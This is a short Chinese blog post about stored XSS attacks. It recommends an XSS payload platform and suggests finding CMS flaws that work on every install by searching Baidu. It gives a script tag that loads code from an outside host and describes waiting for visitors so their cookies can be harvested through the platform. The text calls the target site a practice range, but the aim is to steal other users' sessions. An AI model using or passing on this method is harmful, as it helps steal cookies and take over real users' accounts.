XSS的本质就是用户的输入输出被当成前端JS代码执行了,那么存储型和其他XSS区别在于他会储存到服务器里面去,危害是XSS中最大的。
我们首先需要一个XSS平台http://xss.tf/index.php?do=login这个平台可以帮我们做出很多的JS功能,我们只要把JS语句插进去那么就可以无所不能。只要JS能实现的,在这里我们都可以实现。
靶场的话可以百度查找cms通杀漏洞找到之后我们可以插入自己的XSS代码:
<script src=http://xxx/xxxxx></script>
然后等待其他人访问吗,通过XSS平台拿到cookie
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.